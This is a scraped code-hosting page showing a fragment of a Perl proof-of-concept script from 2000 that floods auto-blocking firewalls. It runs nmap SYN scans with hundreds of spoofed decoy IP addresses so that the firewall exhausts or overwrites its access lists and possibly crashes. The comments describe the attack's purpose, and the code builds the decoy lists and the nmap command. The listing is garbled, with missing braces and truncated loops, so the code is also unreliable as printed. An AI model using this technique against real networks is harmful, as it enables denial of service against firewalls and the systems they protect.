Skip to content
Find file
Fetching contributors…
Cannot retrieve contributors at this time
49 lines (40 sloc) 1.34 KB
# PERL script to possibly kill firewall systems that actively block IP
# numbers if the system detects that the IP is scanning more than 20 ports
# on a network behind the firewall. Works by basically creating a lot of
# decoys with nmap. Router/firewall will try to block all the (decoyed) IP
# numbers, eventually running out of access list/packetfilters, and possibly
# crashing, or overwriting access lists. Make sure your target is a machine
# behind the firewall. Requires nmap.
# This is a proof of concept code - not to be used on live systems.
# Standard disclaimer etc..
# Roelof Temmingh 2000/10/20
if ($#ARGV != 0) {die "usage: decoyblues target_behind_firewall\n";}
my $target=@ARGV[0];
my $passed;
sub gonmapactive
# add my IP right at the end of it all
system "nmap -T Aggressive -D $passed -sS $target -p 20-40\n";
for ($a=1; $a<255; $a++){
for ($b=1; $b<255; $b++){
# when we got a 100 decoys, ship it off to nmap
if ($count==100) {
# Spidermark: sensepostdata
Roelof W Temmingh SensePost IT security +27 83 448 6996
Something went wrong with that request. Please try again.